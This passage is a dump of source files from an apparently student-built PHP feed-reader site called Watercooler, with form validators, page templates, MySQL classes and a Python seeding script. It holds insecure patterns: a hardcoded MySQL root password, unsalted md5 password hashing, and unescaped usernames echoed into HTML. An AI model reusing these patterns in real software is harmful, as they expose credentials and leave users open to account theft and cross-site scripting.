{\n\t return FALSE;\n\t }\n // then we check how long the string is\n elseif(strlen($string) > $length)\n\t {\n\t return FALSE;\n\t }\nelse\n {\n // if all is well, we return TRUE\n return TRUE;\n }\n }\n\n // check ALL the REQUEST variables\nfunction checkSet()\n{\n return isset($_REQUEST['userName'], $_REQUEST['userPassword'], $_REQUEST['userRepeatPass'], $_REQUEST['userEmail'], $_REQUEST['userCell'], $_REQUEST['userCarrier']);\n}\n\nfunction checkEmail($email)\n{\n return preg_match('/^\\S+@[\\w\\d.-]{2,}\\.[\\w]{2,6}$/iU', $email) ? 
TRUE : FALSE;\n}\n\n// check all our variables are set\nif(checkSet() != FALSE)\n {\n // Sanity check the username variable.\n\n if(empty($_REQUEST['userName'])==FALSE && sanityCheck($_REQUEST['userName'], 'string', 25) != FALSE)\n {\n $userName = $_REQUEST['userName'];\n }\n else\n {\n echo 'Username is not set';\n exit();\n }\n\n // *************** TODO **************\n // *Verify that username is available*\n // ***********************************\n\n // Validate the password input\n if(empty($_REQUEST['userPassword'])==FALSE && sanityCheck($_REQUEST['userPassword'], 'string', 10) != FALSE)\n {\n\tif (strlen($_REQUEST['userPassword']) < 6)\n\t {\n\t echo 'Please choose a password of at least 6 characters';\n\t exit();\n\t }\n\telse\n\t {\n\t $userPassword = $_REQUEST['userPassword'];\n\t }\n }\n else\n {\n echo 'Please enter a valid Password';\n exit();\n }\n\n // Make sure that the two password entries are identical\n if (empty($_REQUEST['userRepeatPass'])==FALSE && sanityCheck($_REQUEST['userRepeatPass'], 'string', 10) != FALSE)\n {\n\t$userRepeatPass = $_REQUEST['userRepeatPass'];\n\tif ($userPassword != $userRepeatPass)\n\t {\n\t echo 'Password mismatch. Please re-enter your password.';\n\t exit();\n\t }\n }\n else\n {\n\techo 'Please enter your password again in the Repeat Password field.';\n\texit();\n }\n\n // Make sure that the email is syntactically valid\n if (empty($_REQUEST['userEmail'])==FALSE && sanityCheck($_REQUEST['userEmail'], 'string', 50) != FALSE)\n {\n\tif (checkEmail($_REQUEST['userEmail']) == FALSE)\n\t {\n\t echo 'Please enter a valid email address.';\n\t exit();\n\t }\n\t else\n\t {\n\t $userEmail = $_REQUEST['userEmail'];\n\t }\n }\n else\n {\n\techo 'A valid email address is required to register with Watercooler.';\n\texit();\n }\n\n // Validate the user's cell phone number\n if (empty($_REQUEST['userCell'])==FALSE)\n {\n\tif (sanityCheck($_REQUEST['userCell'],'numeric', 10) != FALSE)\n\t {\n\t if (strlen($_REQUEST['userCell']) < 9)\n\t {\n\t\techo 'A valid cell phone number must be either nine or ten digits long';\n\t\texit();\n\t }\n\t else\n\t {\n\t\t$userCell = $_REQUEST['userCell'];\n\t }\n\t }\n\telse\n\t {\n\t echo 'Please enter a valid cell phone number (only numeric characters).';\n\t exit();\n\t }\n }\n elseif($_REQUEST['receive_sms_text'] == 'yes' || $_REQUEST['receive_sms_link'])\n {\n\t$userCell = $_REQUEST['userCell'];\n }\n else\n {\n\techo 'Please enter your cell phone number or deselect the SMS(text) and SMS(link) default methods of reception.';\n\texit();\n }\n\n }\n else\n {\n // this will be the default message if the form accessed without POSTing\n echo '<p>Please fill in the form above</p>';\n }\n\n?>\n" }, { "alpha_fraction": 0.5660377144813538, "alphanum_fraction": 0.5660377144813538, "avg_line_length": 34.33333206176758, "blob_id": "2d72909e4e60dbc47fcff52d29e7f981f6222e33", "content_id": "4ecd50e99a21677cd77d47c99b61a549632c1e06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 106, "license_type": "no_license", "max_line_length": 98, "num_lines": 3, "path": "/www/trunk/common.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\n$page_uri_base = 'http://'.$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['SCRIPT_NAME']), '/').'/';\n" }, { "alpha_fraction": 0.571650505065918, "alphanum_fraction": 0.5829126238822937, "avg_line_length": 30.75308609008789, "blob_id": "ecd35f6bb3d58bf055c058684876027d67aa53ea", "content_id": 
"f1d71ce2df4d28904f0afda79f72c8394707c763", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2575, "license_type": "no_license", "max_line_length": 102, "num_lines": 81, "path": "/www/trunk/homepage.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title><?php echo $user->username; ?>'s homepage</title><!-- ' -->\n <link rel=\"stylesheet\" href=\"watercooler.css\" title=\"watercooler\" />\n <script src=\"http://www.google.com/jsapi\"></script>\n <script>google.load(\"jquery\", \"1\");</script>\n </head>\n <body>\n <div id=\"wrap\">\n <div id=\"header\">\n\t<a href=\"logout.php\" style=\"float:left; position:absolute; text-align:left;\">logout</a>\n\t<div id=\"logo\">\n <a href=\"index.php\"><img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" /></a>\n\t</div>\n </div>\n <div style=\"border-style:none;\" class=\"center\">\n <div id=\"feedreader\">\n\t <div id=\"nav\">\n\t <h1 class=\"title\">\n\t <?php echo $user->username; ?>'s Latest News <!-- ' -->\n\t </h1>\n\t </div>\n\t <div id=\"feedreader_feeds\">\n <?php include('getFeeds.php'); ?>\n\t </div>\n\t <div id=\"feedreader_stories\">\n </div>\n\t</div>\n\t<div id=\"userspace\">\n\t <div id=\"browse\">\n\t <h1 class=\"title\">Browse Feeds</h1>\n\t </div>\n\t <div id=\"feedBrowser\">\n\t <div id=\"feedHeader\" style=\"margin:1em 1em 0 0; border-bottom: 2px solid navy;\">\n\t <div style=\"width:12em;text-align:left; float:left;\">Title</div>\n\t <div style=\"width:3.5em; text-align:right; float:right; margin-right:1em;\">Users</div>\n\t </div>\n\t <div id=\"feedRows\">\n\t <?php include('feedBrowser.php') ?>\n\t </div>\n </div>\n\t</div>\n\t<div id=\"footer\">\n\t <a href=\"settings.php\"><button type=\"button\" class=\"left bigButton\">Settings</button></a>\n\t <a href=\"unsubscribe.php\"><button type=\"button\" class=\"right bigButton\">Delete Account</button></a>\n\t</div>\n </div>\n </div>\n\n <script type=\"text/javascript\">\n function getFeeds() {\n // get reader element\n reader = $('#feedreader_feeds');\n\n // set up and execute the request\n reader.load('getFeeds.php');\n }\n\n function getStories(feedId) {\n // get reader element\n\treader = $('#feedreader_stories');\n\t// notify user that data is being fetched\n\treader.html('<h1>Fetching stories...</h1>');\n \n\t// set up and execute the request\n\treader.load('getStories.php',{id:feedId});\n }\n\n function addFeed(feedId) {\n\t$.post('addFeed.php', {id:feedId},\n\t function(data) {\n\t\t getFeeds();\n\t }, 'text');\n }\n </script>\n \n </body>\n</html> \n" }, { "alpha_fraction": 0.5822737216949463, "alphanum_fraction": 0.585639476776123, "avg_line_length": 27.91351318359375, "blob_id": "830438803b5e2f6cfd88247d4bc97cfe729dcdd7", "content_id": "d69c684a465b5fb630838ea9046dff74b7246c14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 5348, "license_type": "no_license", "max_line_length": 328, "num_lines": 185, "path": "/www/trunk/verifySettings.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\n /**\n * This function can be used to check the sanity of variables\n * @param 
string $type The type of variable can be bool, float, numeric, string, array, or object\n * @param string $string The variable name you would like to check\n * @param string $length The maximum length of the variable\n *\n * return bool\n */\n function sanityCheck($string, $type, $length){\n \n // assign the type\n $type = 'is_'.$type;\n \n if(!$type($string))\n {\n return FALSE;\n }\n // now we see if there is anything in the string\n elseif(empty($string))\n {\n return FALSE;\n }\n // then we check how long the string is\n elseif(strlen($string) > $length)\n {\n return FALSE;\n }\n else\n {\n // if all is well, we return TRUE\n return TRUE;\n }\n}\n\n// check ALL the REQUEST variables\nfunction checkSet()\n{\n return (isset($_REQUEST['userName']) || isset($_REQUEST['userRepeatPass']) || isset($_REQUEST['userEmail']) || isset($_REQUEST['userCell']) || isset($_REQUEST['userCarrier']) || isset($_REQUEST['userFeeds']) || isset($_REQUEST['receive_email']) || isset($_REQUEST['receive_sms_text']) || isset($_REQUEST['receive_sms_link']));\n}\n\nfunction checkEmail($email)\n{\n return preg_match('/^\\S+@[\\w\\d.-]{2,}\\.[\\w]{2,6}$/iU', $email) ? TRUE : FALSE;\n}\n\n$prompt = TRUE;\n\nif(checkset())\n {\n if(empty($_REQUEST['userNewPass'])==FALSE && sanityCheck($_REQUEST['userNewPass'], 'string', 10) != FALSE)\n {\n\tif (strlen($_REQUEST['userNewPass']) < 6)\n\t {\n\t echo '<p style=\"color:red\">Please choose a password of at least 6 characters</p>';\n\t $_REQUEST['userNewPass'] = '';\n\t exit();\n\t }\n\t\n\t// Make sure that the two password entries are identical\n\tif (empty($_REQUEST['userRepeatNewPass'])==FALSE && sanityCheck($_REQUEST['userRepeatNewPass'], 'string', 10) != FALSE)\n\t {\n\t $userRepeatNewPass = $_REQUEST['userRepeatNewPass'];\n\t if ($userRepeatNewPass != $_REQUEST['userNewPass'])\n\t {\n\t\techo '<p style=\"color:red\">Password mismatch. Please re-enter your password.</p>';\n\t\texit();\n\t }\n\t }\n\telse\n\t {\n\t echo '<p style=\"color:red\">Please enter your password again in the Repeat Password field.</p>';\n\t exit();\n\t }\n\t$user->password = md5($_REQUEST['userNewPass']);\n\t$prompt = FALSE;\n }\n \n \n // Sanity check the username variable.\n \n if(empty($_REQUEST['userName'])==FALSE && sanityCheck($_REQUEST['userName'], 'string', 25) != FALSE)\n {\n\tif(User::find('username',$_REQUEST['userName']) != NULL)\n\t {\n\t if($_REQUEST['userName'] != $user->username)\n\t {\n\t\techo '<p style=\"color:red\">Username is already in use. 
Please try another username.</p>';\n\t\texit();\n\t }\n\t \n\t }\n\telse\n\t {\n\t $user->username = $_REQUEST['userName'];\n\t echo \"<p style=\\\"color:navy\\\">Username successfully updated to {$user->username}</p>\";\n\t $prompt = FALSE;\n\t }\n }\n \n \n // Make sure that the email is syntactically valid\n if (empty($_REQUEST['userEmail'])==FALSE && sanityCheck($_REQUEST['userEmail'], 'string', 50) != FALSE)\n {\n\tif (checkEmail($_REQUEST['userEmail']) == FALSE)\n\t {\n\t echo '<p style=\"color:red\">Please enter a valid email address.</p>';\n\t exit();\n\t }\n\telse\n\t {\n\t if ($user->email != $_REQUEST['userEmail'])\n\t {\n\t\t$user->email = $_REQUEST['userEmail'];\n\t\techo \"<p style=\\\"color:navy\\\">Email address successfully updated to {$user->email} </p>\";\n\t\t$prompt = FALSE;\n\t }\n\t }\n }\n \n // Validate the user's cell phone number\n if (empty($_REQUEST['userCell'])==FALSE)\n {\n\tif (sanityCheck($_REQUEST['userCell'],'numeric', 10) != FALSE)\n\t {\n\t if (strlen($_REQUEST['userCell']) != 10)\n\t {\n\t\techo '<p style=\"color:red\">A valid cell phone number must be exactly ten digits long.</p>';\n\t\t$_REQUEST['userCell'] = '';\n\t\texit();\n\t }\n\t else\n\t {\n\t\tif(($this_user_object = User::find('phone_number',$_REQUEST['userCell'])) != NULL)\n\t\t {\n\t\t if ($this_user_object != $user)\n\t\t {\n\t\t\techo '<p style=\"color:red\">There is already an account associated with this cell phone number. If you do not have an account with username ';\n\t\t\t$this_user_array = $this_user_object->get((array)'username');\n\t\t\techo $this_user_array['username'];\n\t\t\techo ', email our <a href=\"mailto:[email protected]\">Customer Service Department</a>.</p>';\n\t\t\texit();\n\t\t }\n\t\t }\n\t\t$user->phone_number = $_REQUEST['userCell'];\n\t\t$prompt = FALSE;\n\t }\n\t }\n\telse\n\t {\n\t echo '<p style=\"color:red\">Please enter a valid cell phone number (only numeric characters).</p>';\n\t $_REQUEST['userCell'] = '';\n\t exit();\n\t }\n }\n \n // unchecked boxes are simply absent from the request, so guard with isset()\n $user->send_email = isset($_REQUEST['receive_email']) && $_REQUEST['receive_email']=='yes';\n $user->send_sms_text = isset($_REQUEST['receive_sms_text']) && $_REQUEST['receive_sms_text']=='yes';\n $user->send_sms_link = isset($_REQUEST['receive_sms_link']) && $_REQUEST['receive_sms_link']=='yes';\n \n $feedinfos = array();\n if(!empty($_REQUEST['feed']))\n {\n\tforeach($_REQUEST['feed'] as $index=>$currentFeed)\n\t {\n\t if (!empty($currentFeed))\n\t $feedinfos[] = array('url'=>$currentFeed, 'name'=>$currentFeed);\n\t }\n\t$prompt = FALSE;\n }\n $user->feeds = Feeds::create($feedinfos);\n \n if ($prompt == FALSE)\n {\n\tprint('<p style=\"color:navy;\">Update Successful.</p>');\n\tprint('<a href=\"index.php\">Here is your homepage!</a>');\n\tprint('<br /><br />');\n }\n }\nelse\n {\n echo '<p style=\"color:navy;\">Edit your user information here.</p>';\n }\n?>" }, { "alpha_fraction": 0.6226624846458435, "alphanum_fraction": 0.6236643195152283, "avg_line_length": 31.089284896850586, "blob_id": "bb54cc9c2b53df6636e0f3c76705e63641fb7069", "content_id": "fc50f6f3b2c5a49dbb1bf0fd5e9e38604ccb2c1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 8984, "license_type": "no_license", "max_line_length": 79, "num_lines": 280, "path": "/www/trunk/db_mysql_stories.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\nrequire_once('db_mysql.php');\n\n/* class MySQLStories implements iStories on MySQL databases (see corresponding\n documentation)\n*/\nclass MySQLStories extends MySQLDBObject implements iStories {\n private 
$db;\n public $stories;\n public $sort_sql = '';\n\n public function __construct(array $stories, MySQLDB $db) {\n $this->stories = $stories;\n $this->db = $db;\n }\n\n/* MySQLStories::get implements iStories::get (see corresponding documentation)\n*/\n public function get(array $storyattrs, $sortattr = NULL, \n\t\t $sortreverse = FALSE) {\n // XXX implement 'category' and 'feed' attributes\n\n if (count($this->stories) == 0)\n return array();\n\n if ($sortattr !== NULL)\n $sort_sql = self::get_sort_sql($sortattr, $sortreverse);\n else\n $sort_sql = $this->sort_sql;\n\n $get_result = array();\n // initialize the flag before the loop so the check below is well-defined\n $sql_added = FALSE;\n\n // build SQL query\n $get_sql = 'SELECT ';\n // add column names\n foreach ($storyattrs as $key=>$attr) {\n if (isset(self::$storyattrs_to_cols[$attr])) {\n\t$get_sql .= self::$storyattrs_to_cols[$attr].\" AS $attr, \";\n\t$sql_added = TRUE;\n }\n }\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= ' FROM feed_stories WHERE fid IN (';\n // add story ids\n for ($i = 0; $i < count($this->stories); $i++)\n $get_sql .= '?, ';\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= \") $sort_sql;\";\n\n if ($sql_added === TRUE) {\n $get_stmt = $this->db->pdo->prepare($get_sql);\n // build an array of story ids\n $ids = array();\n foreach ($this as $story)\n\t$ids[] = $story->id;\n $get_stmt->execute($ids);\n $get_result = $get_stmt->fetchAll();\n if ($get_result === FALSE)\n\tthrow new Exception('PDOStatement::fetchAll failed');\n }\n\n return $get_result;\n }\n\n private static function get_sort_sql($storyattr, $reverse = FALSE) {\n // $forward_dir is the forward sort direction\n static $forward_dir = 'ASC';\n // $reverse_dir is the reversed sort direction\n static $reverse_dir = 'DESC';\n /* setting an attribute as a key to $storyattr_reversed indicates that it\n should be sorted the reverse direction by default */\n static $storyattr_reversed =\n array('timestamp'=>TRUE);\n\n // validate parameters\n if (!is_bool($reverse))\n throw new InvalidArgumentException('parameter $reverse must be a '.\n\t\t\t\t\t 'boolean');\n if (!isset(self::$storyattrs_to_cols[$storyattr]))\n throw new InvalidArgumentException('parameter $storyattr is not a '.\n\t\t\t\t\t 'valid attribute');\n\n // convert story attribute to database column\n $col = self::$storyattrs_to_cols[$storyattr];\n\n // calculate which direction to sort\n if ($reverse) {\n if (isset($storyattr_reversed[$storyattr]))\n\t$dir = $forward_dir;\n else\n\t$dir = $reverse_dir;\n } else {\n if (isset($storyattr_reversed[$storyattr]))\n\t$dir = $reverse_dir;\n else\n\t$dir = $forward_dir;\n }\n\n return \"ORDER BY $col $dir\";\n }\n/* MySQLStories::sort implements iStories::sort (see corresponding \n documentation)\n*/\n public function sort($storyattr, $reverse = FALSE) {\n $this->sort_sql = self::get_sort_sql($storyattr, $reverse);\n }\n \n // these functions implement Iterator\n public function rewind() {\n reset($this->stories);\n }\n public function current() {\n return current($this->stories);\n }\n public function key() {\n return key($this->stories);\n }\n public function next() {\n return next($this->stories);\n }\n public function valid() {\n return ($this->current() !== FALSE);\n }\n}\n\n/* class MySQLStory implements iStory on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLStory extends MySQLDBObject implements iStory {\n private $db;\n /* $fid is the unique feed story identifier which is used to access feed 
story information in the database */\n public $fid;\n\n static $feed_attr = 'feed';\n static $category_attr = 'category';\n\n /* function MySQLStory::__construct is the constructor for the class\n\n $db: (MySQLDB object) a valid MySQLDB object connected to the MySQL\n database to use\n */\n public function __construct(MySQLDB $db) {\n $this->db = $db;\n }\n\n /* function MySQLStory::__get is the PHP magic 'get' function for the \n class */\n public function __get($name) {\n $ret = $this->get(array($name));\n if ($ret === NULL || !isset($ret[$name]))\n return NULL;\n else\n return $ret[$name];\n }\n\n /* parseStoryInfo transforms a $storyinfo array, in the format taken by many\n iStory functions, into an associative array with keys as database column\n names\n */\n private static function parseStoryInfo(array $storyinfo, MySQLDB $db) {\n // rename the storyinfo keys as database column names\n foreach ($storyinfo as $key=>$value)\n if (self::$storyattrs_to_cols[$key] !== NULL)\n\t$db_storyinfo[self::$storyattrs_to_cols[$key]] = $value;\n\n return $db_storyinfo;\n }\n\n/* MySQLStory::find implements iStory::find (see corresponding documentation)\n*/\n public static function find($attr, $value, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__find($attr, $value, $db);\n }\n\n /* MySQLStory::__find is a helper function to MySQLStory::find which performs\n the actual find operation. This function was added in order to use\n typehinting on parameter $db.\n */\n private static function __find($attr, $value, MySQLDB $db) {\n // XXX do this in a more general way\n if ($attr !== 'fid')\n throw new InvalidArgumentException('parameter $attr must be a unique '.\n\t\t\t\t\t 'feed story attribute');\n \n $db_storyinfo = self::parseStoryInfo(array($attr=>$value), $db);\n\n $db_attr = key($db_storyinfo);\n $db_value = current($db_storyinfo);\n\n $find_sql = \"SELECT fid FROM feed_stories WHERE $db_attr=:value;\";\n $find_stmt = $db->pdo->prepare($find_sql);\n $find_stmt->bindParam(':value', $db_value);\n $find_stmt->execute();\n // set fetch mode to create an instance of this class\n $find_stmt->setFetchMode(PDO::FETCH_CLASS, __CLASS__, array('db'=>$db));\n $find_result = $find_stmt->fetch();\n return $find_result !== FALSE ? $find_result : NULL;\n }\n\n /* MySQLStory::getFeed is a written as a helper function to MySQLStory::get\n which carries out the operation of getting a story's feed source\n\n returns a MySQLFeed object representing story's feed source\n */\n private function getFeed() {\n static $feed_sql = 'SELECT sid FROM feed_sources WHERE \n sid=(SELECT sid FROM feed_stories WHERE fid=:fid);';\n $feed_stmt = $this->db->pdo->prepare($feed_sql);\n $feed_stmt->bindParam(':fid', $this->fid);\n $feed_stmt->execute();\n $feed_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLFeed', \n\t\t\t array('db'=>$this->db));\n $feed_result = $feed_stmt->fetch();\n return $feed_result === FALSE ? NULL : $feed_result;\n }\n\n/* MySQLStory::get implements iStory::get (see corresponding documentation)\n*/\n public function get(array $storyattrs) {\n /* $valid_storyattrs is a list of attributes from $storyattrs which can be\n handled by the simple sql query generator below. 
Keep this list updated\n with MySQLDBObject::$storyattrs_to_cols.\n */\n static $valid_storyattrs = \n array('title'=>TRUE, 'content'=>TRUE, 'url'=>TRUE, 'timestamp'=>TRUE);\n static $category_sql = '(SELECT category FROM feed_categories WHERE \n gid=(SELECT gid FROM feed_stories \n WHERE fid=:fid3))';\n\n $sql_added = FALSE;\n $get_result = array();\n\n // build SQL query to use to get story attributes\n $get_sql = 'SELECT ';\n // add column names\n foreach ($storyattrs as $key=>$attr) {\n if (isset($valid_storyattrs[$attr])) {\n\t$get_sql .= self::$storyattrs_to_cols[$attr].\" AS $attr, \";\n\t$sql_added = TRUE;\n } else if ($attr === self::$category_attr) {\n\t$get_sql .= \"$category_sql AS $attr, \";\n\t$sql_added = TRUE;\n }\n }\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= ' FROM feed_stories WHERE fid=:fid;';\n\n // do not attempt the SELECT if no attrs were added to the select\n if ($sql_added === TRUE) {\n $get_stmt = $this->db->pdo->prepare($get_sql);\n $get_stmt->bindParam(':fid', $this->fid);\n\n $get_stmt->execute();\n $get_result = $get_stmt->fetch(PDO::FETCH_ASSOC);\n if ($get_result === FALSE)\n\tthrow new Exception('PDOStatement::fetch failed');\n }\n\n // get id if requested\n if (in_array('id', $storyattrs))\n $get_result['id'] = $this->fid;\n if (in_array('fid', $storyattrs))\n $get_result['fid'] = $this->fid;\n\n // get feed source if requested\n if (in_array(self::$feed_attr, $storyattrs))\n $get_result[self::$feed_attr] = $this->getFeed();\n\n return $get_result;\n }\n}" }, { "alpha_fraction": 0.5535477995872498, "alphanum_fraction": 0.5747025012969971, "avg_line_length": 27.08974266052246, "blob_id": "f9641cc9dffee1942ef7e17618c93ad6d0f8fe31", "content_id": "84b1e0e28420339ae1fbf6ec208e06c50b1fd82b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2269, "license_type": "no_license", "max_line_length": 337, "num_lines": 78, "path": "/email_testing_insDefault.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\r\n\r\nimport sys\r\nimport MySQLdb\r\n\r\nconn = MySQLdb.connect (host = \"localhost\",\r\n user = \"root\",\r\n passwd = \"adminsql\",\r\n db = \"watercooler\")\r\ncursor = conn.cursor ()\r\n\r\nusers_table = [(\"lcdefault\", \"lcpassword\", \"simon\", \"tang\", \"650-804-0503\", \"[email protected]\", 0, 0, 1)]\r\n\r\nreceptions_table = [(1, 1)]\r\n\r\nreception_table = [(\"email\"),\r\n\t\t (\"sms_text\"),\r\n\t\t (\"sms_link\")]\r\n\r\ncarrior_table = [(\"AT&T\"),\r\n\t\t (\"T-Mobile\"),\r\n\t\t (\"Verizon\"),\r\n\t\t (\"Sprint\")]\r\n\r\nfavorites_table = [(1, 1, 1)]\r\n\r\nsources_table = [(\"espn\", \"http://sports.espn.go.com/espn/rss/news\")]\r\n\r\nfeeds_table = [(\"2010 NBA Playoffs: LeBron James confident Cleveland Cavaliers can come back against Boston Celtics\", \"LeBron James isn't listening to the nationwide criticism of his listless Game 5 performance against Boston.\", \"http://sports.espn.go.com/nba/playoffs/2010/news/story?id=5183847&campaign=rss&source=ESPNHeadlines\", 1273684800, 1, 1)\r\n]\r\n\r\ncategory_table = [(\"top_story\"),\r\n\t\t (\"highest_rated\"),\r\n\t\t (\"most_viewed\")]\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO users (username, password, first_name, last_name, phone_number, email, email_status, phone_status, cid)\r\n\t\t VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\r\n\t\t \"\"\", 
users_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO receptions (uid, rid)\r\n\t\t VALUES (%s, %s)\r\n\t\t \"\"\", receptions_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO reception_methods (method_type)\r\n\t\t VALUES (%s)\r\n\t\t \"\"\", reception_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO carriors (carrior_name)\r\n\t\t VALUES (%s)\r\n\t\t \"\"\", carrior_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO favorites (uid, sid, priority)\r\n\t\t VALUES (%s, %s, %s)\r\n\t\t \"\"\", favorites_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO feed_sources (source_name, source_url)\r\n\t\t VALUES (%s, %s)\r\n\t\t \"\"\", sources_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO feed_stories (title, content, url, time_stamp, sid, gid)\r\n\t\t VALUES (%s, %s, %s, %s, %s, %s)\r\n\t\t \"\"\", feeds_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO feed_categories (category)\r\n\t\t VALUES (%s)\r\n\t\t \"\"\", category_table)\r\n\r\ncursor.close ()\r\nconn.commit ()\r\nconn.close ()\r\n" }, { "alpha_fraction": 0.6400580406188965, "alphanum_fraction": 0.6502177119255066, "avg_line_length": 40.75757598876953, "blob_id": "51a3ce68799fa42cc8e646deffa35fea88552a2c", "content_id": "2d20f6ecfb6743cbe723750e5e94b9b92bd0ac8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1378, "license_type": "no_license", "max_line_length": 143, "num_lines": 33, "path": "/www/trunk/confirm.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\nrequire_once('db_init.php');\n\nif (isset($_REQUEST['id']) && isset($_REQUEST['pin']))\n if (($user = User::find('id', $_REQUEST['id'])) !== NULL\n && $user->email_pin === $_REQUEST['pin'])\n $user->email_confirmed = TRUE;\n\n?>\n\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <link rel=\"SHORTCUT ICON\" href=\"http://geogriffin.mine.nu/watercooler/matt/watercooler-content-distribution/favicon.ico\" />\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Welcome to the Watercooler!</title>\n <link rel=\"stylesheet\" title=\"watercooler\" href=\"watercooler.css\" type=\"text/css\"/>\n </head>\n <body>\n <div id=\"wrap\">\n <div id=\"logo\">\n\t<a href=\"index.php\"><img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" /></a>\n </div>\n <div class=\"center\">\n <fieldset style=\"width:22em;\"><legend>Success!</legend>\n <p style=\"color:navy;\">Your account has been confirmed. 
Click on the Watercooler logo to bring up the login page.</p>\n <p style=\"color:navy;\">Note that you will not receive any text messages until you have confirmed your phone number via the settings page.</p>\n\t<p><a href=\"index.php\">Return to the Watercooler homepage</a></p>\n </fieldset>\n </div>\n </div>\n </body>\n</html>\n" }, { "alpha_fraction": 0.6430349946022034, "alphanum_fraction": 0.6438367962837219, "avg_line_length": 35.178627014160156, "blob_id": "eb085d49375dae0d1e7cc794047b41fd5c4dcb90", "content_id": "449b4666450665a885b3b17a2ae202fde6647cb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 23697, "license_type": "no_license", "max_line_length": 79, "num_lines": 655, "path": "/www/trunk/db_mysql_users.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\nrequire_once('db_mysql.php');\nrequire_once('db_mysql_feeds.php');\n\n/* class MySQLUsers implements iUsers on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLUsers extends MySQLDBObject implements iUsers {\n /* $db is the database which contains these users */\n private $db;\n /* $users is an array of MySQLUser objects which represent the users in this\n set */\n // XXX there may be a better way to do this\n public $users;\n\n /* $carrier_attr is the attribute name which corresponds to carrier */\n static $carrier_attr = 'carrier';\n\n /* function MySQLUsers::__construct is the constructor for the class\n\n $db: (MySQLDB) a valid MySQLDB object connected to the MySQL\n database to use\n */\n private function __construct(array $users, MySQLDB $db) {\n $this->users = $users;\n $this->db = $db;\n }\n\n /* MySQLUsers::__search is a helper function to MySQLUsers::searchAll and\n MySQLUsers::searchAny which performs the actual search operations\n\n $userinfo: (array) user information to search by, encoded in key-value\n pairs as described for the $userinfo parameter in iUser::set\n $op: (string) the MySQL operator to use in between each search term \n (e.g. 'OR' or 'AND')\n $db: (MySQLDB) a valid MySQLDB object connected to the MySQL database to\n use\n\n returns a MySQLUsers object representing the matched group of users\n */\n private static function __search(array $userinfo, $op, MySQLDB $db) {\n // build SQL query to use to search for users\n $search_sql = 'SELECT uid FROM users WHERE ';\n foreach ($userinfo as $attr=>$values) {\n foreach ((array) $values as $key=>$value) {\n\tif (isset(self::$userattrs_to_cols[$attr]))\n\t $search_sql .= \n\t self::$userattrs_to_cols[$attr].\"=? $op \";\n\telseif($attr === self::$carrier_attr)\n\t $search_sql .= \n\t \"cid=(SELECT cid FROM carriors WHERE carrior_name=?) 
